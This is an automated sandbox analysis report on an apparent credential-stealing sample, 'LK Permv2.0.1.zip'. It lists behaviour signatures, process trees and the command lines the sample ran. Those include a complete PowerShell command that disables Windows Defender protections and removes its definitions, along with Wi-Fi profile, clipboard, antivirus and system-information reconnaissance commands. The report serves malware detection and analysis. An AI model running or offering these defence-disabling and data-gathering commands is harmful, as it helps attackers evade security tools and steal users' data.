Malware Analysis Report

2025-04-03 14:11

Sample ID 241104-s6ffaavmgq
Target LK Permv2.0.1.zip
SHA256 266b8efffa3749a8b68e0fca0141006920bacdf3ad5bad9d7640fa83f03aae0e
Tags
collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

266b8efffa3749a8b68e0fca0141006920bacdf3ad5bad9d7640fa83f03aae0e

Threat Level: Shows suspicious behavior

The file LK Permv2.0.1.zip was found to be: Shows suspicious behavior.

Malicious Activity Summary

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Loads dropped DLL

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Executes dropped EXE

Clipboard Data

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Obfuscated Files or Information: Command Obfuscation

Command and Scripting Interpreter: PowerShell

Drops file in System32 directory

Enumerates processes with tasklist

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Embeds OpenSSL

Enumerates physical storage devices

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Gathers system information

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-04 15:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 15:44

Reported

2024-11-04 15:47

Platform

win11-20241007-en

Max time kernel

147s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LKPerm.exe"

Signatures

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\LKPerm2.vpunpun C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Browser Information Discovery

discovery

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4800 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\LKPerm.exe C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe
PID 4800 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\LKPerm.exe C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe
PID 3544 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe C:\Windows\system32\cmd.exe
PID 3544 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe C:\Windows\system32\cmd.exe
PID 2112 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe
PID 2112 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe
PID 2112 wrote to memory of 3536 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe
PID 2112 wrote to memory of 3536 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe
PID 2112 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3344 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe
PID 3344 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe
PID 1688 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 5012 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe
PID 5012 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe
PID 1688 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 3536 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe
PID 3536 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe
PID 3080 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3080 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3300 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3300 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3780 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3780 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1016 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1016 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1456 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1456 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4984 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4984 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1176 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1176 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1688 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 1688 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3532 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3532 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4896 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4924 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4924 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe

Processes

C:\Users\Admin\AppData\Local\Temp\LKPerm.exe

"C:\Users\Admin\AppData\Local\Temp\LKPerm.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe

C:\Users\Admin\AppData\Local\Temp\LKPerm.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "plugin\run.bat"

C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe

"C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe"

C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe

"C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe"

C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe

C:\Users\Admin\AppData\Local\Temp\plugin\plugin.exe

C:\Users\Admin\AppData\Local\Temp\onefile_5012_133752087155273744\svchost.exe

C:\Users\Admin\AppData\Local\Temp\plugin\svchost.exe

C:\Users\Admin\AppData\Local\Temp\onefile_3536_133752087156347503\sdp.exe

C:\Users\Admin\AppData\Local\Temp\plugin\sdp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

